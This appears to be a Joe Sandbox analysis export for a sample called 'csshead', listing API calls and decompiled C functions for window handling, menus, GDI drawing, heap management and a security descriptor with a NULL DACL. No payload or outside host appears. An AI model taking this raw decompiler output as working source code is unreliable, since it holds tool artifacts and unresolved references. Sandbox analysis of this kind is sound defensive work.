    • Snapshot File: hcaresult_0_2_410000_csshead.jbxd
    APIs
      • Part of subcall function 00422804: RtlFreeHeap.NTDLL(00000000,00000000,?,00425EDC,00000000,?,?,00417F96,00000009), ref: 0042281A
      • Part of subcall function 00422804: GetLastError.KERNEL32(00000000,?,00425EDC,00000000,?,?,00417F96,00000009), ref: 0042282C
    • RaiseException.KERNEL32(C000008C,00000001,00000000,00000000), ref: 0041F7AB
      • Part of subcall function 00423911: std::exception::exception.LIBCMT ref: 00423960
    • MessageBoxA.USER32(?,00436854,00435A8C,00000030), ref: 0041F803
    • MessageBoxA.USER32(?,00436854,00435A8C,00000030), ref: 0041F83F
    • LoadCursorA.USER32(00000000,00007F02), ref: 0041F895
    • SetCursor.USER32(00000000), ref: 0041F8A0
    • SetCursor.USER32(?), ref: 0041F8CC
    • MessageBoxA.USER32(?,00436840,00435A8C,00000030), ref: 0041F8FE
    Memory Dump Source
    • Source File: 00000000.00000002.16598145890.00410000.00000020.sdmp, Offset: 00410000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_410000_csshead.jbxd
    APIs
    • GetClassLongA.USER32(00000000,000000DE), ref: 004110FB
    • GetParent.USER32(?), ref: 00411129
      • Part of subcall function 00410C90: GetVersionExA.KERNEL32(?,00000000,00000090), ref: 00410CBD
    • GetParent.USER32(?), ref: 00411186
    • GetParent.USER32(?), ref: 004111CA
    • GetWindowRect.USER32 ref: 00411219
    • GetParent.USER32(?), ref: 00411223
    • MapWindowPoints.USER32(00000000,00000000,?,00000002), ref: 00411233
    Memory Dump Source
    • Source File: 00000000.00000002.16598145890.00410000.00000020.sdmp, Offset: 00410000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_410000_csshead.jbxd
    APIs
    • FindResourceA.KERNEL32(00442B94,?,000000F1), ref: 0041F4B8
    • LoadResource.KERNEL32(00442B94,00000000), ref: 0041F4CE
    • LockResource.KERNEL32(00000000), ref: 0041F4D9
    • LoadImageA.USER32(00442B94,?,00000000,00000000,00000000,00002040), ref: 0041F596
      • Part of subcall function 0041E6B0: DeleteObject.GDI32(00000000,00000000), ref: 0041E6C3
    • LoadBitmapA.USER32(00442B94,?), ref: 0041F5B3
    • DeleteObject.GDI32(00000000), ref: 0041F623
      • Part of subcall function 00410BB0: GetVersionExA.KERNEL32 ref: 00410BD6
    • DeleteObject.GDI32(00000000), ref: 0041F652
      • Part of subcall function 0041EE80: GetCurrentObject.GDI32(00000000,00000007), ref: 0041EEA3
      • Part of subcall function 0041EE80: SelectObject.GDI32(00000000,?), ref: 0041EEDA
      • Part of subcall function 0041EE80: DeleteDC.GDI32(00000000), ref: 0041EF7C
      • Part of subcall function 0041EE80: GetCurrentProcess.KERNEL32 ref: 0041F006
      • Part of subcall function 0041EE80: FlushInstructionCache.KERNEL32(00000000), ref: 0041F00D
      • Part of subcall function 0041EE80: SetWindowLongA.USER32(?,000000FC,?), ref: 0041F01A
      • Part of subcall function 00411B80: DeleteObject.GDI32 ref: 00411B8A
      • Part of subcall function 0041E1F0: FindResourceA.KERNEL32(00442B94,?,00000002), ref: 0041E200
      • Part of subcall function 0041E1F0: LoadResource.KERNEL32(00442B94,00000000), ref: 0041E208
      • Part of subcall function 0041E1F0: LockResource.KERNEL32(00000000), ref: 0041E20F
    Memory Dump Source
    • Source File: 00000000.00000002.16598145890.00410000.00000020.sdmp, Offset: 00410000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_410000_csshead.jbxd
    APIs
    • GetVersionExA.KERNEL32(?), ref: 00419104
    • SendMessageA.USER32 ref: 00419186
    • IsWindow.USER32(00000000), ref: 0041918F
    • SendMessageA.USER32(00000000,0000052F,00000000,?), ref: 004191D0
      • Part of subcall function 00411910: GetMonitorInfoA.USER32 ref: 0041196C
    • TrackPopupMenuEx.USER32(?,-00000001,00000000,?,?,?), ref: 00419202
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.16598145890.00410000.00000020.sdmp, Offset: 00410000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_410000_csshead.jbxd
    APIs
    • CallWindowProcA.USER32(?,?,?,?,?), ref: 00414E8C
    • RtlEnterCriticalSection.NTDLL(00442B64), ref: 00414F07
    • GetCurrentThreadId.KERNEL32 ref: 00414F1A
    • RtlLeaveCriticalSection.NTDLL(00442B64), ref: 00414F51
    • RaiseException.KERNEL32(C000008C,00000001,00000000,00000000), ref: 00414F6A
    • UnhookWindowsHookEx.USER32(00000000), ref: 00414F93
      • Part of subcall function 00422804: RtlFreeHeap.NTDLL(00000000,00000000,?,00425EDC,00000000,?,?,00417F96,00000009), ref: 0042281A
      • Part of subcall function 00422804: GetLastError.KERNEL32(00000000,?,00425EDC,00000000,?,?,00417F96,00000009), ref: 0042282C
    • RtlLeaveCriticalSection.NTDLL(00442B64), ref: 0041500D
      • Part of subcall function 00412950: GetVersionExA.KERNEL32(?,00000000,00000030), ref: 004129A7
      • Part of subcall function 00412950: RaiseException.KERNEL32(C000008C,00000001,00000000,00000000), ref: 00412A19
    Memory Dump Source
    • Source File: 00000000.00000002.16598145890.00410000.00000020.sdmp, Offset: 00410000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_410000_csshead.jbxd
    APIs
    • LoadMenuA.USER32(00442B94), ref: 00420FA1
      • Part of subcall function 00420A00: GetCurrentProcess.KERNEL32 ref: 00420A36
      • Part of subcall function 00420A00: FlushInstructionCache.KERNEL32(00000000), ref: 00420A3D
      • Part of subcall function 00420A00: SetLastError.KERNEL32(0000000E), ref: 00420A57
      • Part of subcall function 00420A00: CreateWindowExA.USER32(?,?,?,?,?,00000000,000000E9,?,?,?,00442B90,?), ref: 00420AD1
    • GetParent.USER32(?), ref: 0042107A
    • SetFocus.USER32(00000000), ref: 00421081
    • IsWindowVisible.USER32(?), ref: 0042109B
    • GetFocus.USER32 ref: 004210A5
    • IsChild.USER32(00000000,00000000), ref: 004210AD
    • SetFocus.USER32(00000000), ref: 004210B8
    Memory Dump Source
    • Source File: 00000000.00000002.16598145890.00410000.00000020.sdmp, Offset: 00410000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_410000_csshead.jbxd
    APIs
    • GetParent.USER32(?), ref: 00411640
    • SendMessageA.USER32(00000000,0000040C,00000000,00000000), ref: 00411656
    • GetVersionExA.KERNEL32(?), ref: 0041169F
    • LoadLibraryA.KERNEL32(00436280), ref: 004116D6
    • GetProcAddress.KERNEL32(00000000,00436270), ref: 004116EF
    • FreeLibrary.KERNEL32(00000000), ref: 0041170A
    • SendMessageA.USER32(00000000,0000041D,00000000,?), ref: 0041174F
    Memory Dump Source
    • Source File: 00000000.00000002.16598145890.00410000.00000020.sdmp, Offset: 00410000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_410000_csshead.jbxd
    APIs
    • GetSystemMetrics.USER32(0000000F), ref: 00413F80
    • GetObjectA.GDI32(00000038,0000003C,?), ref: 00413FDC
    • CreateFontIndirectA.GDI32(?), ref: 00413FEF
    • DrawTextA.USER32(00000000,?,000000FF,?,00000424), ref: 00414032
    • GetObjectA.GDI32(00000038,0000003C,?), ref: 0041406F
    • GetSystemMetrics.USER32(00000047), ref: 004140AD
    • DeleteObject.GDI32(?), ref: 004140C3
    Memory Dump Source
    • Source File: 00000000.00000002.16598145890.00410000.00000020.sdmp, Offset: 00410000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_410000_csshead.jbxd
    APIs
    • _ValidateScopeTableHandlers.LIBCMT ref: 00429B61
    • __FindPESection.LIBCMT ref: 00429B7B
    • VirtualQuery.KERNEL32(?,004420A4,0000001C,004420A4,?,?,?,?,?,00429F50,0043CE68,000000FE,?,00423B11,?), ref: 00429C61
    • __FindPESection.LIBCMT ref: 00429CB0
    • _ValidateScopeTableHandlers.LIBCMT ref: 00429CD4
      • Part of subcall function 004299A0: __FindPESection.LIBCMT ref: 004299E3
      • Part of subcall function 004299A0: __FindPESection.LIBCMT ref: 00429A21
    • __FindPESection.LIBCMT ref: 00429CEE
    Memory Dump Source
    • Source File: 00000000.00000002.16598145890.00410000.00000020.sdmp, Offset: 00410000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_410000_csshead.jbxd
    APIs
    • GetSubMenu.USER32(?,?), ref: 00416F7D
      • Part of subcall function 00416AF0: RtlEnterCriticalSection.NTDLL(00442B64), ref: 00416B05
      • Part of subcall function 00416AF0: GetCurrentThreadId.KERNEL32 ref: 00416B27
      • Part of subcall function 00416AF0: SetWindowsHookExA.USER32(00000005,Function_00006430,00442B90,00000000), ref: 00416B36
      • Part of subcall function 00416AF0: TrackPopupMenuEx.USER32(?,?,00000000,?,?,?), ref: 00416B89
      • Part of subcall function 00416AF0: UnhookWindowsHookEx.USER32(00442A54), ref: 00416BA1
      • Part of subcall function 00416AF0: RtlLeaveCriticalSection.NTDLL(00442B64), ref: 00416BB8
      • Part of subcall function 00416AF0: GetMenuItemCount.USER32(00433394), ref: 00416C2A
      • Part of subcall function 00416AF0: GetVersionExA.KERNEL32(?,?,00000000,00000090,?,00000000,00000030), ref: 00416C6B
      • Part of subcall function 00416AF0: GetMenuItemInfoA.USER32(00433394,00000000,00000001,0000002C), ref: 00416CA3
      • Part of subcall function 00416AF0: lstrlen.KERNEL32(?), ref: 00416CDD
      • Part of subcall function 00416AF0: SetMenuItemInfoA.USER32(00433394,00000000,00000001,0000002C), ref: 00416CF8
      • Part of subcall function 00416AF0: ModifyMenuA.USER32(00433394,00000000,?,?,00000000), ref: 00416D17
      • Part of subcall function 00416AF0: GetMenuItemCount.USER32(00433394), ref: 00416D34
    • GetFocus.USER32 ref: 0041702B
    • PtInRect.USER32(?,?,?), ref: 00417098
    • RtlEnterCriticalSection.NTDLL(00442A20), ref: 004170DB
    • RegisterClipboardFormatA.USER32(004362E8), ref: 004170EF
    • RtlLeaveCriticalSection.NTDLL(00442A20), ref: 004170FB
      • Part of subcall function 004140E0: SetFocus.USER32(?), ref: 00414123
      • Part of subcall function 004140E0: SendMessageA.USER32 ref: 00414141
    Memory Dump Source
    • Source File: 00000000.00000002.16598145890.00410000.00000020.sdmp, Offset: 00410000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_410000_csshead.jbxd
    APIs
    • GetCurrentObject.GDI32(00000000,00000007), ref: 0041EEA3
    • SelectObject.GDI32(00000000,?), ref: 0041EEDA
    • DeleteDC.GDI32(00000000), ref: 0041EF7C
    • SetWindowLongA.USER32(?,000000FC,?), ref: 0041F01A
      • Part of subcall function 00421F2E: GetProcessHeap.KERNEL32(00000000,0000000D,?,?,004124FE), ref: 00421EB2
      • Part of subcall function 00421F2E: RtlAllocateHeap.NTDLL(00000000), ref: 00421EB9
      • Part of subcall function 00421F2E: VirtualAlloc.KERNEL32(00000000,00001000,00001000,00000040,?,?,004124FE), ref: 00421EDD
      • Part of subcall function 00421F2E: VirtualFree.KERNEL32(00000000,00000000,00008000,?,?,004124FE), ref: 00421F05
      • Part of subcall function 00421F2E: RtlInterlockedPushEntrySList.NTDLL(00000000), ref: 00421F1C
    • GetCurrentProcess.KERNEL32 ref: 0041F006
    • FlushInstructionCache.KERNEL32(00000000), ref: 0041F00D
      • Part of subcall function 0041E470: SelectObject.GDI32(?,00000000), ref: 0041E504
    Memory Dump Source
    • Source File: 00000000.00000002.16598145890.00410000.00000020.sdmp, Offset: 00410000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_410000_csshead.jbxd
    APIs
    • IsWindowEnabled.USER32(?), ref: 004121F0
    • GetFocus.USER32 ref: 004121FE
    • MessageBeep.USER32(00000000), ref: 00412304
      • Part of subcall function 00411010: SendMessageA.USER32(?,0000044E,?,?), ref: 00411023
    • MessageBeep.USER32(00000000), ref: 00412232
    • GetClientRect.USER32(?,?), ref: 0041225F
    • PostMessageA.USER32(?,00000100,00000028,00000000), ref: 004122E0
      • Part of subcall function 00410FF0: SendMessageA.USER32(?,00000448,?,00000000), ref: 00410FFF
    Memory Dump Source
    • Source File: 00000000.00000002.16598145890.00410000.00000020.sdmp, Offset: 00410000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_410000_csshead.jbxd
    APIs
    • CallWindowProcA.USER32(?,?,?,?,?), ref: 0041658D
      • Part of subcall function 00415980: GetVersionExA.KERNEL32(?,00000090), ref: 004159B5
      • Part of subcall function 00415980: SystemParametersInfoA.USER32(00000029,00000158,?,00000000), ref: 004159FA
      • Part of subcall function 00415980: GetClientRect.USER32 ref: 00415AB9
      • Part of subcall function 004124F0: GetCurrentProcess.KERNEL32 ref: 00412525
      • Part of subcall function 004124F0: FlushInstructionCache.KERNEL32(00000000), ref: 0041252C
      • Part of subcall function 004124F0: SetWindowLongA.USER32(?,000000FC,00000000), ref: 0041253E
    • RtlEnterCriticalSection.NTDLL(00442B64), ref: 004165ED
    • GetCurrentThreadId.KERNEL32 ref: 00416616
      • Part of subcall function 00414220: RaiseException.KERNEL32(C000008C,00000001,00000000,00000000), ref: 00414270
    • GetWindowLongA.USER32(00000000,000000EC), ref: 004166AB
      • Part of subcall function 00423911: std::exception::exception.LIBCMT ref: 00423960
    • SetWindowsHookExA.USER32(00000003,Function_00005B20,00442B90,00000000), ref: 00416669
    • RtlLeaveCriticalSection.NTDLL(00442B64), ref: 0041669F
    Memory Dump Source
    • Source File: 00000000.00000002.16598145890.00410000.00000020.sdmp, Offset: 00410000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_410000_csshead.jbxd
    APIs
    • lstrlen.KERNEL32(?,004420A4), ref: 00432A87
    • MultiByteToWideChar.KERNEL32(00000000,00000000,?,00000001,00000000,00000000), ref: 00432A9D
    • GetLastError.KERNEL32 ref: 00432AAC
      • Part of subcall function 00422A18: RtlAllocateHeap.NTDLL(00000000,00000001,?), ref: 00422A5D
    • MultiByteToWideChar.KERNEL32(00000000,00000000,?,00000001,00000000,00000000), ref: 00432B3B
    • GetLastError.KERNEL32 ref: 00432B56
    • SysAllocString.OLEAUT32(00000000), ref: 00432B71
      • Part of subcall function 00429814: IsDebuggerPresent.KERNEL32 ref: 0042FAF6
      • Part of subcall function 00429814: SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 0042FB0B
      • Part of subcall function 00429814: UnhandledExceptionFilter.KERNEL32(0043A498), ref: 0042FB16
      • Part of subcall function 00429814: GetCurrentProcess.KERNEL32 ref: 0042FB32
      • Part of subcall function 00429814: TerminateProcess.KERNEL32(00000000), ref: 0042FB39
      • Part of subcall function 00422804: RtlFreeHeap.NTDLL(00000000,00000000,?,00425EDC,00000000,?,?,00417F96,00000009), ref: 0042281A
      • Part of subcall function 00422804: GetLastError.KERNEL32(00000000,?,00425EDC,00000000,?,?,00417F96,00000009), ref: 0042282C
    Memory Dump Source
    • Source File: 00000000.00000002.16598145890.00410000.00000020.sdmp, Offset: 00410000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_410000_csshead.jbxd
    APIs
    • GetMessagePos.USER32 ref: 00412389
    • WindowFromPoint.USER32(?,00000000), ref: 004123BB
    • ScreenToClient.USER32(?,?), ref: 004123CF
    • SendMessageA.USER32(?,00000445,00000000,?), ref: 004123E5
    • GetMenuItemCount.USER32(?), ref: 00412415
      • Part of subcall function 00410FD0: SendMessageA.USER32(?,00000417,?,?), ref: 00410FE2
    • ScreenToClient.USER32(?,?), ref: 004124BF
    Memory Dump Source
    • Source File: 00000000.00000002.16598145890.00410000.00000020.sdmp, Offset: 00410000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_410000_csshead.jbxd
    C-Code - Quality: 89%
    			E0040F870(void* __ebx, void* __ecx) {
    				struct HMENU__* _t35;
    				intOrPtr _t36;
    				void* _t38;
    				intOrPtr _t43;
    				void* _t63;
    				void* _t64;
    
    				_t63 = __ecx;
    				if(IsWindow( *(__ecx + 0x5c)) != 0) {
    					if( *((intOrPtr*)(_t63 + 0x6c)) == GetWindowLongA( *(_t63 + 0x5c), 0xfffffffc) && SetWindowLongA( *(_t63 + 0x5c), 0xfffffffc,  *(_t63 + 0x74)) != 0) {
    						 *(_t63 + 0x74) =  *0x4334dc;
    						 *(_t63 + 0x5c) = 0;
    					}
    				}
    				_t35 =  *(_t63 + 0x44);
    				if(_t35 != 0 && ( *(_t63 + 0x58) & 0x00000002) == 0) {
    					DestroyMenu(_t35);
    				}
    				_t36 =  *((intOrPtr*)(_t63 + 0x48));
    				if(_t36 != 0) {
    					 *0x433030(_t36);
    				}
    				_t37 =  *((intOrPtr*)(_t63 + 0xb4));
    				if( *((intOrPtr*)(_t63 + 0xb4)) != 0) {
    					E00422804(_t37);
    					_t64 = _t64 + 4;
    					 *((intOrPtr*)(_t63 + 0xb4)) = 0;
    				}
    				 *((intOrPtr*)(_t63 + 0xb8)) = 0;
    				 *((intOrPtr*)(_t63 + 0xbc)) = 0;
    				_t38 =  *(_t63 + 0xa4);
    				if(_t38 != 0 && DeleteObject(_t38) != 0) {
    					 *(_t63 + 0xa4) = 0;
    				}
    				_t39 =  *((intOrPtr*)(_t63 + 0x6c));
    				if( *((intOrPtr*)(_t63 + 0x6c)) != 0) {
    					L00421E7E(_t39);
    				}
    				_t40 =  *((intOrPtr*)(_t63 + 0x4c));
    				if( *((intOrPtr*)(_t63 + 0x4c)) != 0) {
    					E00422804(_t40);
    					_t64 = _t64 + 4;
    					 *((intOrPtr*)(_t63 + 0x4c)) = 0;
    				}
    				 *((intOrPtr*)(_t63 + 0x50)) = 0;
    				 *((intOrPtr*)(_t63 + 0x54)) = 0;
    				_t41 =  *((intOrPtr*)(_t63 + 0x34));
    				if( *((intOrPtr*)(_t63 + 0x34)) != 0) {
    					L00421E7E(_t41);
    				}
    				_t42 =  *((intOrPtr*)(_t63 + 0x14));
    				if( *((intOrPtr*)(_t63 + 0x14)) != 0) {
    					E00422804(_t42);
    					_t64 = _t64 + 4;
    					 *((intOrPtr*)(_t63 + 0x14)) = 0;
    				}
    				 *((intOrPtr*)(_t63 + 0x18)) = 0;
    				 *((intOrPtr*)(_t63 + 0x1c)) = 0;
    				_t43 =  *((intOrPtr*)(_t63 + 8));
    				if(_t43 != 0) {
    					_t43 = E00422804(_t43);
    					 *((intOrPtr*)(_t63 + 8)) = 0;
    				}
    				 *((intOrPtr*)(_t63 + 0x10)) = 0;
    				 *((intOrPtr*)(_t63 + 0xc)) = 0;
    				return _t43;
    			}
    0x0040f871
    0x0040f882
    0x0040f897
    0x0040f8b3
    0x0040f8b6
    0x0040f8b6
    0x0040f897
    0x0040f8b9
    0x0040f8be
    0x0040f8c7
    0x0040f8c7
    0x0040f8cd
    0x0040f8d2
    0x0040f8d5
    0x0040f8d5
    0x0040f8db
    0x0040f8e3
    0x0040f8e6
    0x0040f8eb
    0x0040f8ee
    0x0040f8ee
    0x0040f8f4
    0x0040f8fa
    0x0040f900
    0x0040f908
    0x0040f915
    0x0040f915
    0x0040f91b
    0x0040f920
    0x0040f923
    0x0040f923
    0x0040f928
    0x0040f92d
    0x0040f930
    0x0040f935
    0x0040f938
    0x0040f938
    0x0040f93b
    0x0040f93e
    0x0040f941
    0x0040f946
    0x0040f949
    0x0040f949
    0x0040f94e
    0x0040f953
    0x0040f956
    0x0040f95b
    0x0040f95e
    0x0040f95e
    0x0040f961
    0x0040f964
    0x0040f967
    0x0040f96c
    0x0040f96f
    0x0040f977
    0x0040f977
    0x0040f97a
    0x0040f97d
    0x0040f982

    APIs
    • IsWindow.USER32(?), ref: 0040F878
    • GetWindowLongA.USER32(?,000000FC), ref: 0040F88E
    • SetWindowLongA.USER32(?,000000FC,?), ref: 0040F8A3
    • DestroyMenu.USER32(?), ref: 0040F8C7
    • ImageList_Destroy.COMCTL32(?), ref: 0040F8D5
    • DeleteObject.GDI32(?), ref: 0040F90B
      • Part of subcall function 00422804: RtlFreeHeap.NTDLL(00000000,00000000,?,00425EDC), ref: 0042281A
      • Part of subcall function 00422804: GetLastError.KERNEL32(00000000,?,00425EDC), ref: 0042282C
    Memory Dump Source
    • Source File: 00000000.00000001.16492833487.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000001.16492829053.00400000.00000002.sdmp
    • Associated: 00000000.00000001.16492883376.00433000.00000004.sdmp
    • Associated: 00000000.00000001.16492897994.00440000.00000008.sdmp
    • Associated: 00000000.00000001.16492902766.00442000.00000004.sdmp
    • Associated: 00000000.00000001.16492907006.00445000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_1_400000_csshead.jbxd
    APIs
    • GetSysColorBrush.USER32(0000001D), ref: 0041557A
    • FillRect.USER32(?,?,00000000), ref: 00415586
    • GetSysColorBrush.USER32(0000000D), ref: 0041558E
    • FrameRect.USER32(?,?,00000000), ref: 0041559A
    • GetSysColor.USER32(00000011), ref: 004155C4
      • Part of subcall function 00413E50: SetTextColor.GDI32(?,?), ref: 00413E6B
      • Part of subcall function 00413E50: SetBkMode.GDI32(?,?), ref: 00413E76
      • Part of subcall function 00413E50: SendMessageA.USER32(?,00000031,00000000,00000000), ref: 00413E86
      • Part of subcall function 00413E50: SelectObject.GDI32(?,00000000), ref: 00413E9C
      • Part of subcall function 00413E50: SendMessageA.USER32 ref: 00413F0F
      • Part of subcall function 00413E50: DrawTextA.USER32(?,000000C8,000000FF,?,?), ref: 00413F37
      • Part of subcall function 00413E50: SelectObject.GDI32(?,?), ref: 00413F47
    • GetSysColor.USER32(00000011), ref: 004155F3
    Memory Dump Source
    • Source File: 00000000.00000002.16598145890.00410000.00000020.sdmp, Offset: 00410000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_410000_csshead.jbxd
    C-Code - Quality: 64%
    			E00404408(intOrPtr* __eax, struct _SECURITY_DESCRIPTOR* __edx) {
    				intOrPtr* _v8;
    				struct _SECURITY_DESCRIPTOR* _v12;
    				struct _ACL* _v16;
    				void* _v20;
    				int _v24;
    				int _v28;
    				struct _ACL* _v32;
    				intOrPtr _t37;
    				signed int _t38;
    				signed int _t50;
    				signed int _t59;
    
    				_v12 = __edx;
    				_v8 = __eax;
    				_v16 = 0;
    				if(InitializeSecurityDescriptor(_v12, 1) != 0 && SetSecurityDescriptorDacl(_v12, 0xffffffff, 0, 0) != 0) {
    					_t37 =  *0x40a0d4; // 0x401cb4
    					_t38 =  *0x40b32c(_t37, 1,  &_v20, 0);
    					asm("sbb eax, eax");
    					if( ~( ~_t38) == 0) {
    						_v20 = 0xffffffff;
    					} else {
    						_v32 = 0;
    						_t50 = GetSecurityDescriptorSacl(_v20,  &_v24,  &_v32,  &_v28);
    						asm("sbb eax, eax");
    						if( ~( ~_t50) == 0) {
    							L5:
    							LocalFree(_v20);
    							_v20 = 0xffffffff;
    						} else {
    							_t59 = SetSecurityDescriptorSacl(_v12, _v24, _v32, _v28);
    							asm("sbb eax, eax");
    							if( ~( ~_t59) == 0) {
    								goto L5;
    							}
    						}
    					}
    					if(_v8 != 0) {
    						 *_v8 = 0xc;
    						 *(_v8 + 4) = _v12;
    						 *((intOrPtr*)(_v8 + 8)) = 0;
    					}
    					_v16 = _v20;
    				}
    				return _v16;
    			}
    0x0040440e
    0x00404411
    0x00404416
    0x00404427
    0x0040444d
    0x00404453
    0x0040445b
    0x00404461
    0x004044bb
    0x00404463
    0x00404465
    0x00404478
    0x00404480
    0x00404486
    0x004044a8
    0x004044ac
    0x004044b2
    0x00404488
    0x00404498
    0x004044a0
    0x004044a6
    0x00000000
    0x00000000
    0x004044a6
    0x00404486
    0x004044c6
    0x004044cb
    0x004044d7
    0x004044df
    0x004044df
    0x004044e5
    0x004044e5
    0x004044ee

    APIs
    • InitializeSecurityDescriptor.ADVAPI32(?,00000001), ref: 0040441F
    • SetSecurityDescriptorDacl.ADVAPI32(?,000000FF,00000000,00000000), ref: 00404437
    • ConvertStringSecurityDescriptorToSecurityDescriptorA.ADVAPI32(00401CB4,00000001,?,00000000), ref: 00404453
    • GetSecurityDescriptorSacl.ADVAPI32(?,?,?,?), ref: 00404478
    • SetSecurityDescriptorSacl.ADVAPI32(?,?,?,?), ref: 00404498
    • LocalFree.KERNEL32(?), ref: 004044AC
    Memory Dump Source
    • Source File: 00000000.00000002.16598108329.00403000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.16598086936.00400000.00000002.sdmp
    • Associated: 00000000.00000002.16598097640.00401000.00000040.sdmp
    • Associated: 00000000.00000002.16598122919.0040A000.00000004.sdmp
    • Associated: 00000000.00000002.16598135430.0040E000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_csshead.jbxd
    APIs
      • Part of subcall function 00429814: IsDebuggerPresent.KERNEL32 ref: 0042FAF6
      • Part of subcall function 00429814: SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 0042FB0B
      • Part of subcall function 00429814: UnhandledExceptionFilter.KERNEL32(0043A498), ref: 0042FB16
      • Part of subcall function 00429814: GetCurrentProcess.KERNEL32 ref: 0042FB32
      • Part of subcall function 00429814: TerminateProcess.KERNEL32(00000000), ref: 0042FB39
    • __isleadbyte_l.LIBCMT ref: 0042B7B9
    • _strlen.LIBCMT ref: 0042B8D3
    • __aulldvrm.INT64 ref: 0042BC12
    • _write_string.LIBCMT ref: 0042BD55
    • _write_string.LIBCMT ref: 0042BE26
      • Part of subcall function 00422804: RtlFreeHeap.NTDLL(00000000,00000000,?,00425EDC,00000000,?,?,00417F96,00000009), ref: 0042281A
      • Part of subcall function 00422804: GetLastError.KERNEL32(00000000,?,00425EDC,00000000,?,?,00417F96,00000009), ref: 0042282C
      • Part of subcall function 0042FF3F: __isleadbyte_l.LIBCMT ref: 0042FFA6
      • Part of subcall function 0042FF3F: MultiByteToWideChar.KERNEL32(00000080,00000009,00422655,?,00000000,00000000,?,?,?,?,00422655), ref: 0042FFD7
      • Part of subcall function 0042FF3F: MultiByteToWideChar.KERNEL32(00000080,00000009,00422655,00000001,00000000,00000000,?,?,?,?,00422655), ref: 00430045
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.16598145890.00410000.00000020.sdmp, Offset: 00410000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_410000_csshead.jbxd
    C-Code - Quality: 100%
    			E0040A4A0(int* _a4, intOrPtr* _a8) {
    				int _v4;
    				int _v12;
    				int _t9;
    				int _t13;
    				int* _t16;
    				intOrPtr* _t20;
    				struct HDC__* _t23;
    
    				_t16 = _a4;
    				if(_t16 == 0) {
    					L00401230(0x80004003);
    				}
    				_t20 = _a8;
    				if(_t20 == 0) {
    					L00401230(0x80004003);
    				}
    				_t23 = GetDC(0);
    				_v4 = GetDeviceCaps(_t23, 0x58);
    				_t9 = GetDeviceCaps(_t23, 0x5a);
    				ReleaseDC(0, _t23);
    				 *_t20 = MulDiv(0x9ec,  *_t16, _v12);
    				_t13 = MulDiv(0x9ec, _t16[1], _t9);
    				 *(_t20 + 4) = _t13;
    				return _t13;
    			}
    0x0040a4a1
    0x0040a4a7
    0x0040a4ae
    0x0040a4ae
    0x0040a4b4
    0x0040a4ba
    0x0040a4c1
    0x0040a4c1
    0x0040a4d6
    0x0040a4e0
    0x0040a4e4
    0x0040a4eb
    0x0040a506
    0x0040a512
    0x0040a516
    0x0040a51b

    APIs
    • MulDiv.KERNEL32(000009EC,?,00000000), ref: 0040A512
      • Part of subcall function 00401230: RaiseException.KERNEL32(-C006C020,00000001,00000000,00000000,0040807F,80004005), ref: 0040124C
    • GetDC.USER32(00000000), ref: 0040A4CA
    • GetDeviceCaps.GDI32(00000000,00000058), ref: 0040A4DB
    • GetDeviceCaps.GDI32(00000000,0000005A), ref: 0040A4E4
    • ReleaseDC.USER32(00000000,00000000), ref: 0040A4EB
    • MulDiv.KERNEL32(000009EC,?,?), ref: 0040A504
    Memory Dump Source
    • Source File: 00000000.00000001.16492833487.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000001.16492829053.00400000.00000002.sdmp
    • Associated: 00000000.00000001.16492883376.00433000.00000004.sdmp
    • Associated: 00000000.00000001.16492897994.00440000.00000008.sdmp
    • Associated: 00000000.00000001.16492902766.00442000.00000004.sdmp
    • Associated: 00000000.00000001.16492907006.00445000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_1_400000_csshead.jbxd
    C-Code - Quality: 100%
    			E00421E10() {
    				int _t3;
    				long _t5;
    				long _t7;
    				long _t13;
    				void* _t19;
    				LONG* _t22;
    
    				_t3 = IsProcessorFeaturePresent(0xc);
    				if(_t3 != 0) {
    					_t22 =  *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x34;
    					_t5 =  *_t22;
    					if(_t5 != 0) {
    						L7:
    						 *0x442b5c = _t5;
    						_t7 = 1;
    					} else {
    						_t19 = HeapAlloc(GetProcessHeap(), _t5, 8);
    						_t7 = 0;
    						if(_t19 != 0) {
    							 *_t19 = 0;
    							 *((intOrPtr*)(_t19 + 4)) = 0;
    							if(InterlockedCompareExchange(_t22, _t19, 0) != 0) {
    								HeapFree(GetProcessHeap(), 0, _t19);
    							}
    							_t5 =  *_t22;
    							goto L7;
    						}
    					}
    					return _t7;
    				} else {
    					_t13 = _t3 + 1;
    					 *0x442b5c = _t13;
    					return _t13;
    				}
    			}
    0x00421e12
    0x00421e1a
    0x00421e2e
    0x00421e31
    0x00421e36
    0x00421e72
